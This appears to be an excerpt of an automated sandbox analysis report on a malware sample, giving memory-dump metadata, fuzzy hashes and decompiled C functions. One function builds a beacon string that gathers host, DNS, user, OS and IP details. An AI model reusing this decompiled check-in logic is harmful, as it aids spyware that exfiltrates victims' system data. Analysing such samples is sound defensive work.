                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb377
                                                                                                                                                                                              0x00dfb379
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb379
                                                                                                                                                                                              0x00dfb33e
                                                                                                                                                                                              0x00dfb340
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DFB3AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2850889275-0
                                                                                                                                                                                              • Opcode ID: 6d3fe2e268ba0ea908679f7c1715abd60d57fde675c6781cf50a16a307e84249
                                                                                                                                                                                              • Instruction ID: 108671c84d79d30725518cc4d4f347110f2c25f0a86b89e06f792625a18a184b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d3fe2e268ba0ea908679f7c1715abd60d57fde675c6781cf50a16a307e84249
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C61B43164060A9FDB25CF28C99063973E6EB45378F2AC02BDA46C7295E730D882C7B4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00A821D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                              				signed int* _t43;
                                                                                                                                                                                              				char _t44;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				long _t66;
                                                                                                                                                                                              				signed int* _t80;
                                                                                                                                                                                              				signed int* _t82;
                                                                                                                                                                                              				void* _t84;
                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				void* _t99;
                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t43 = _t84;
                                                                                                                                                                                              				_t65 = __ebx + 2;
                                                                                                                                                                                              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                              				_t89 = _t95;
                                                                                                                                                                                              				_t96 = _t95 - 8;
                                                                                                                                                                                              				_push(_t65);
                                                                                                                                                                                              				_push(_t84);
                                                                                                                                                                                              				_push(_t89);
                                                                                                                                                                                              				asm("cld");
                                                                                                                                                                                              				_t66 = _a8;
                                                                                                                                                                                              				_t44 = _a4;
                                                                                                                                                                                              				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                              					_push(_t89);
                                                                                                                                                                                              					E00A8233B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                              					_t46 = 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_v12 = _t44;
                                                                                                                                                                                              					_v8 = _a12;
                                                                                                                                                                                              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                              					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                              					_t80 =  *(_t66 + 8);
                                                                                                                                                                                              					_t49 = E00A823F5(_t66);
                                                                                                                                                                                              					_t99 = _t96 + 4;
                                                                                                                                                                                              					if(_t49 == 0) {
                                                                                                                                                                                              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						while(_t86 != 0xffffffff) {
                                                                                                                                                                                              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                              							if(_t53 == 0) {
                                                                                                                                                                                              								L8:
                                                                                                                                                                                              								_t80 =  *(_t66 + 8);
                                                                                                                                                                                              								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t54 =  *_t53();
                                                                                                                                                                                              								_t89 = _t89;
                                                                                                                                                                                              								_t86 = _t86;
                                                                                                                                                                                              								_t66 = _a8;
                                                                                                                                                                                              								_t55 = _t54;
                                                                                                                                                                                              								_t106 = _t54;
                                                                                                                                                                                              								if(_t106 == 0) {
                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									if(_t106 < 0) {
                                                                                                                                                                                              										_t46 = 0;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t82 =  *(_t66 + 8);
                                                                                                                                                                                              										E00A822E0(_t55, _t66);
                                                                                                                                                                                              										_t89 = _t66 + 0x10;
                                                                                                                                                                                              										E00A8233B(_t89, _t66, 0);
                                                                                                                                                                                              										_t99 = _t99 + 0xc;
                                                                                                                                                                                              										E00A823D7(_t82[2]);
                                                                                                                                                                                              										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                              										_t66 = 0;
                                                                                                                                                                                              										_t86 = 0;
                                                                                                                                                                                              										 *(_t82[2])(1);
                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L11:
                                                                                                                                                                                              						_t46 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L13:
                                                                                                                                                                                              				return _t46;
                                                                                                                                                                                              			}























                                                                                                                                                                                              0x00a821d8
                                                                                                                                                                                              0x00a821d9
                                                                                                                                                                                              0x00a821da
                                                                                                                                                                                              0x00a821dd
                                                                                                                                                                                              0x00a821df
                                                                                                                                                                                              0x00a821e2
                                                                                                                                                                                              0x00a821e3
                                                                                                                                                                                              0x00a821e5
                                                                                                                                                                                              0x00a821e6
                                                                                                                                                                                              0x00a821e7
                                                                                                                                                                                              0x00a821ea
                                                                                                                                                                                              0x00a821f4
                                                                                                                                                                                              0x00a822a5
                                                                                                                                                                                              0x00a822ac
                                                                                                                                                                                              0x00a822b5
                                                                                                                                                                                              0x00a821fa
                                                                                                                                                                                              0x00a821fa
                                                                                                                                                                                              0x00a82200
                                                                                                                                                                                              0x00a82206
                                                                                                                                                                                              0x00a82209
                                                                                                                                                                                              0x00a8220c
                                                                                                                                                                                              0x00a82210
                                                                                                                                                                                              0x00a82215
                                                                                                                                                                                              0x00a8221a
                                                                                                                                                                                              0x00a8229a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8221c
                                                                                                                                                                                              0x00a8221c
                                                                                                                                                                                              0x00a82228
                                                                                                                                                                                              0x00a8222a
                                                                                                                                                                                              0x00a82285
                                                                                                                                                                                              0x00a82285
                                                                                                                                                                                              0x00a8228b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8222c
                                                                                                                                                                                              0x00a8223b
                                                                                                                                                                                              0x00a8223d
                                                                                                                                                                                              0x00a8223e
                                                                                                                                                                                              0x00a8223f
                                                                                                                                                                                              0x00a82242
                                                                                                                                                                                              0x00a82242
                                                                                                                                                                                              0x00a82244
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82246
                                                                                                                                                                                              0x00a82246
                                                                                                                                                                                              0x00a82290
                                                                                                                                                                                              0x00a82248
                                                                                                                                                                                              0x00a82248
                                                                                                                                                                                              0x00a8224c
                                                                                                                                                                                              0x00a82254
                                                                                                                                                                                              0x00a82259
                                                                                                                                                                                              0x00a8225e
                                                                                                                                                                                              0x00a8226a
                                                                                                                                                                                              0x00a82272
                                                                                                                                                                                              0x00a82279
                                                                                                                                                                                              0x00a8227f
                                                                                                                                                                                              0x00a82283
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82283
                                                                                                                                                                                              0x00a82246
                                                                                                                                                                                              0x00a82244
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8222a
                                                                                                                                                                                              0x00a8229e
                                                                                                                                                                                              0x00a8229e
                                                                                                                                                                                              0x00a8229e
                                                                                                                                                                                              0x00a8221a
                                                                                                                                                                                              0x00a822ba
                                                                                                                                                                                              0x00a822c1

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                              • Instruction ID: d2d918d42706551fc43476606f9b8541e5ed8f91d76da6272d81ed9c6f576469
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21B872900204ABD710FF68C880AB7BBA5FF48350B058168DD559B245E730FA25C7E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00DFB0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                              				signed int* _t43;
                                                                                                                                                                                              				char _t44;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				long _t66;
                                                                                                                                                                                              				signed int* _t80;
                                                                                                                                                                                              				signed int* _t82;
                                                                                                                                                                                              				void* _t84;
                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				void* _t99;
                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t43 = _t84;
                                                                                                                                                                                              				_t65 = __ebx + 2;
                                                                                                                                                                                              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                              				_t89 = _t95;
                                                                                                                                                                                              				_t96 = _t95 - 8;
                                                                                                                                                                                              				_push(_t65);
                                                                                                                                                                                              				_push(_t84);
                                                                                                                                                                                              				_push(_t89);
                                                                                                                                                                                              				asm("cld");
                                                                                                                                                                                              				_t66 = _a8;
                                                                                                                                                                                              				_t44 = _a4;
                                                                                                                                                                                              				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                              					_push(_t89);
                                                                                                                                                                                              					E00DFB243(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                              					_t46 = 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_v12 = _t44;
                                                                                                                                                                                              					_v8 = _a12;
                                                                                                                                                                                              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                              					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                              					_t80 =  *(_t66 + 8);
                                                                                                                                                                                              					_t49 = E00DFB2FD(_t66);
                                                                                                                                                                                              					_t99 = _t96 + 4;
                                                                                                                                                                                              					if(_t49 == 0) {
                                                                                                                                                                                              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						while(_t86 != 0xffffffff) {
                                                                                                                                                                                              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                              							if(_t53 == 0) {
                                                                                                                                                                                              								L8:
                                                                                                                                                                                              								_t80 =  *(_t66 + 8);
                                                                                                                                                                                              								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t54 =  *_t53();
                                                                                                                                                                                              								_t89 = _t89;
                                                                                                                                                                                              								_t86 = _t86;
                                                                                                                                                                                              								_t66 = _a8;
                                                                                                                                                                                              								_t55 = _t54;
                                                                                                                                                                                              								_t106 = _t54;
                                                                                                                                                                                              								if(_t106 == 0) {
                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									if(_t106 < 0) {
                                                                                                                                                                                              										_t46 = 0;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t82 =  *(_t66 + 8);
                                                                                                                                                                                              										E00DFB1E8(_t55, _t66);
                                                                                                                                                                                              										_t89 = _t66 + 0x10;
                                                                                                                                                                                              										E00DFB243(_t89, _t66, 0);
                                                                                                                                                                                              										_t99 = _t99 + 0xc;
                                                                                                                                                                                              										E00DFB2DF(_t82[2]);
                                                                                                                                                                                              										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                              										_t66 = 0;
                                                                                                                                                                                              										_t86 = 0;
                                                                                                                                                                                              										 *(_t82[2])(1);
                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L11:
                                                                                                                                                                                              						_t46 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L13:
                                                                                                                                                                                              				return _t46;
                                                                                                                                                                                              			}























                                                                                                                                                                                              0x00dfb0e0
                                                                                                                                                                                              0x00dfb0e1
                                                                                                                                                                                              0x00dfb0e2
                                                                                                                                                                                              0x00dfb0e5
                                                                                                                                                                                              0x00dfb0e7
                                                                                                                                                                                              0x00dfb0ea
                                                                                                                                                                                              0x00dfb0eb
                                                                                                                                                                                              0x00dfb0ed
                                                                                                                                                                                              0x00dfb0ee
                                                                                                                                                                                              0x00dfb0ef
                                                                                                                                                                                              0x00dfb0f2
                                                                                                                                                                                              0x00dfb0fc
                                                                                                                                                                                              0x00dfb1ad
                                                                                                                                                                                              0x00dfb1b4
                                                                                                                                                                                              0x00dfb1bd
                                                                                                                                                                                              0x00dfb102
                                                                                                                                                                                              0x00dfb102
                                                                                                                                                                                              0x00dfb108
                                                                                                                                                                                              0x00dfb10e
                                                                                                                                                                                              0x00dfb111
                                                                                                                                                                                              0x00dfb114
                                                                                                                                                                                              0x00dfb118
                                                                                                                                                                                              0x00dfb11d
                                                                                                                                                                                              0x00dfb122
                                                                                                                                                                                              0x00dfb1a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb124
                                                                                                                                                                                              0x00dfb124
                                                                                                                                                                                              0x00dfb130
                                                                                                                                                                                              0x00dfb132
                                                                                                                                                                                              0x00dfb18d
                                                                                                                                                                                              0x00dfb18d
                                                                                                                                                                                              0x00dfb193
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb134
                                                                                                                                                                                              0x00dfb143
                                                                                                                                                                                              0x00dfb145
                                                                                                                                                                                              0x00dfb146
                                                                                                                                                                                              0x00dfb147
                                                                                                                                                                                              0x00dfb14a
                                                                                                                                                                                              0x00dfb14a
                                                                                                                                                                                              0x00dfb14c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb14e
                                                                                                                                                                                              0x00dfb14e
                                                                                                                                                                                              0x00dfb198
                                                                                                                                                                                              0x00dfb150
                                                                                                                                                                                              0x00dfb150
                                                                                                                                                                                              0x00dfb154
                                                                                                                                                                                              0x00dfb15c
                                                                                                                                                                                              0x00dfb161
                                                                                                                                                                                              0x00dfb166
                                                                                                                                                                                              0x00dfb172
                                                                                                                                                                                              0x00dfb17a
                                                                                                                                                                                              0x00dfb181
                                                                                                                                                                                              0x00dfb187
                                                                                                                                                                                              0x00dfb18b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb18b
                                                                                                                                                                                              0x00dfb14e
                                                                                                                                                                                              0x00dfb14c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb132
                                                                                                                                                                                              0x00dfb1a6
                                                                                                                                                                                              0x00dfb1a6
                                                                                                                                                                                              0x00dfb1a6
                                                                                                                                                                                              0x00dfb122
                                                                                                                                                                                              0x00dfb1c2
                                                                                                                                                                                              0x00dfb1c9

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                              • Instruction ID: 701822e8d8a773b8ba168334db2245538201b07ed939f2dd11253e330350c9b3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                              • Instruction Fuzzy Hash: 752195729003089BCB14DF68C8909BBB7A5FF45360B0AC169DA559B245D730FA15C7F0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                                                              			E00DF514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				void* _v48;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				intOrPtr _t28;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                              				intOrPtr _t51;
                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                              				intOrPtr* _t57;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                                                              				intOrPtr _t74;
                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                              				int _t80;
                                                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                                                              				int _t84;
                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                              				int _t89;
                                                                                                                                                                                              				intOrPtr* _t92;
                                                                                                                                                                                              				intOrPtr* _t93;
                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                              				void* _t98;
                                                                                                                                                                                              				void* _t99;
                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				int _t104;
                                                                                                                                                                                              				void* _t105;
                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                              				void* _t108;
                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t98 = __edx;
                                                                                                                                                                                              				_t94 = __ecx;
                                                                                                                                                                                              				_t26 = __eax;
                                                                                                                                                                                              				_t108 = _a16;
                                                                                                                                                                                              				_v4 = 8;
                                                                                                                                                                                              				if(__eax == 0) {
                                                                                                                                                                                              					_t26 = GetTickCount();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t27 =  *0xdfd018; // 0x1f7541c4
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t28 =  *0xdfd014; // 0x3a87c8cd
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t29 =  *0xdfd010; // 0xd8d2f808
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t30 =  *0xdfd00c; // 0xeec43f25
                                                                                                                                                                                              				asm("bswap eax");
                                                                                                                                                                                              				_t31 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t3 = _t31 + 0xdfe633; // 0x74666f73
                                                                                                                                                                                              				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0xdfd02c,  *0xdfd004, _t26);
                                                                                                                                                                                              				_t34 = E00DF57AB();
                                                                                                                                                                                              				_t35 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t4 = _t35 + 0xdfe673; // 0x74707526
                                                                                                                                                                                              				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                                                                                                                                                                              				_t111 = _t109 + 0x38;
                                                                                                                                                                                              				_t105 = _t104 + _t38;
                                                                                                                                                                                              				_t99 = E00DF73E9(_t94);
                                                                                                                                                                                              				if(_t99 != 0) {
                                                                                                                                                                                              					_t86 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t6 = _t86 + 0xdfe8cb; // 0x736e6426
                                                                                                                                                                                              					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                                                                                                                                                                              					_t111 = _t111 + 0xc;
                                                                                                                                                                                              					_t105 = _t105 + _t89;
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _t99);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t100 = E00DF614A();
                                                                                                                                                                                              				if(_t100 != 0) {
                                                                                                                                                                                              					_t81 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t8 = _t81 + 0xdfe8d3; // 0x6f687726
                                                                                                                                                                                              					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                                                                                                                                                                              					_t111 = _t111 + 0xc;
                                                                                                                                                                                              					_t105 = _t105 + _t84;
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _t100);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t101 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				_a32 = E00DF757B(0xdfd00a, _t101 + 4);
                                                                                                                                                                                              				_t43 =  *0xdfd2cc; // 0x0
                                                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                                                              					_t77 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t11 = _t77 + 0xdfe8ad; // 0x3d736f26
                                                                                                                                                                                              					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                                                                                                                                                                              					_t111 = _t111 + 0xc;
                                                                                                                                                                                              					_t105 = _t105 + _t80;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t44 =  *0xdfd2c8; // 0x0
                                                                                                                                                                                              				if(_t44 != 0) {
                                                                                                                                                                                              					_t74 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              					_t13 = _t74 + 0xdfe8a6; // 0x3d706926
                                                                                                                                                                                              					wsprintfA(_t105 + _t108, _t13, _t44);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_a32 != 0) {
                                                                                                                                                                                              					_t103 = RtlAllocateHeap( *0xdfd238, 0, 0x800);
                                                                                                                                                                                              					if(_t103 != 0) {
                                                                                                                                                                                              						E00DF749F(GetTickCount());
                                                                                                                                                                                              						_t51 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              						__imp__(_t51 + 0x40);
                                                                                                                                                                                              						asm("lock xadd [eax], ecx");
                                                                                                                                                                                              						_t55 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              						__imp__(_t55 + 0x40);
                                                                                                                                                                                              						_t57 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              						_t106 = E00DF4D2C(1, _t98, _t108,  *_t57);
                                                                                                                                                                                              						asm("lock xadd [eax], ecx");
                                                                                                                                                                                              						if(_t106 != 0) {
                                                                                                                                                                                              							StrTrimA(_t106, 0xdfc294);
                                                                                                                                                                                              							_t63 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							_push(_t106);
                                                                                                                                                                                              							_t15 = _t63 + 0xdfe252; // 0x616d692f
                                                                                                                                                                                              							_t65 = E00DF9DEF(_t15);
                                                                                                                                                                                              							_v20 = _t65;
                                                                                                                                                                                              							if(_t65 != 0) {
                                                                                                                                                                                              								_t92 = __imp__;
                                                                                                                                                                                              								 *_t92(_t106, _v4);
                                                                                                                                                                                              								 *_t92(_t103, _v0);
                                                                                                                                                                                              								_t93 = __imp__;
                                                                                                                                                                                              								 *_t93(_t103, _v32);
                                                                                                                                                                                              								 *_t93(_t103, _t106);
                                                                                                                                                                                              								_t71 = E00DF666E(0xffffffffffffffff, _t103, _v32, _v28);
                                                                                                                                                                                              								_v56 = _t71;
                                                                                                                                                                                              								if(_t71 != 0 && _t71 != 0x10d2) {
                                                                                                                                                                                              									E00DF6106();
                                                                                                                                                                                              								}
                                                                                                                                                                                              								HeapFree( *0xdfd238, 0, _v48);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							HeapFree( *0xdfd238, 0, _t106);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						HeapFree( *0xdfd238, 0, _t103);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _a24);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				HeapFree( *0xdfd238, 0, _t108);
                                                                                                                                                                                              				return _a12;
                                                                                                                                                                                              			}

















































                                                                                                                                                                                              0x00df514f
                                                                                                                                                                                              0x00df514f
                                                                                                                                                                                              0x00df514f
                                                                                                                                                                                              0x00df5154
                                                                                                                                                                                              0x00df515a
                                                                                                                                                                                              0x00df5164
                                                                                                                                                                                              0x00df5166
                                                                                                                                                                                              0x00df5166
                                                                                                                                                                                              0x00df5173
                                                                                                                                                                                              0x00df517e
                                                                                                                                                                                              0x00df5181
                                                                                                                                                                                              0x00df518c
                                                                                                                                                                                              0x00df518f
                                                                                                                                                                                              0x00df5194
                                                                                                                                                                                              0x00df5197
                                                                                                                                                                                              0x00df519c
                                                                                                                                                                                              0x00df519f
                                                                                                                                                                                              0x00df51ab
                                                                                                                                                                                              0x00df51b8
                                                                                                                                                                                              0x00df51ba
                                                                                                                                                                                              0x00df51c0
                                                                                                                                                                                              0x00df51c5
                                                                                                                                                                                              0x00df51d0
                                                                                                                                                                                              0x00df51d2
                                                                                                                                                                                              0x00df51d5
                                                                                                                                                                                              0x00df51dc
                                                                                                                                                                                              0x00df51e0
                                                                                                                                                                                              0x00df51e2
                                                                                                                                                                                              0x00df51e7
                                                                                                                                                                                              0x00df51f3
                                                                                                                                                                                              0x00df51f5
                                                                                                                                                                                              0x00df5201
                                                                                                                                                                                              0x00df5203
                                                                                                                                                                                              0x00df5203
                                                                                                                                                                                              0x00df520e
                                                                                                                                                                                              0x00df5212
                                                                                                                                                                                              0x00df5214
                                                                                                                                                                                              0x00df5219
                                                                                                                                                                                              0x00df5225
                                                                                                                                                                                              0x00df5227
                                                                                                                                                                                              0x00df5233
                                                                                                                                                                                              0x00df5235
                                                                                                                                                                                              0x00df5235
                                                                                                                                                                                              0x00df523b
                                                                                                                                                                                              0x00df524e
                                                                                                                                                                                              0x00df5252
                                                                                                                                                                                              0x00df5259
                                                                                                                                                                                              0x00df525c
                                                                                                                                                                                              0x00df5261
                                                                                                                                                                                              0x00df526c
                                                                                                                                                                                              0x00df526e
                                                                                                                                                                                              0x00df5271
                                                                                                                                                                                              0x00df5271
                                                                                                                                                                                              0x00df5273
                                                                                                                                                                                              0x00df527a
                                                                                                                                                                                              0x00df527d
                                                                                                                                                                                              0x00df5282
                                                                                                                                                                                              0x00df528c
                                                                                                                                                                                              0x00df528e
                                                                                                                                                                                              0x00df5296
                                                                                                                                                                                              0x00df52af
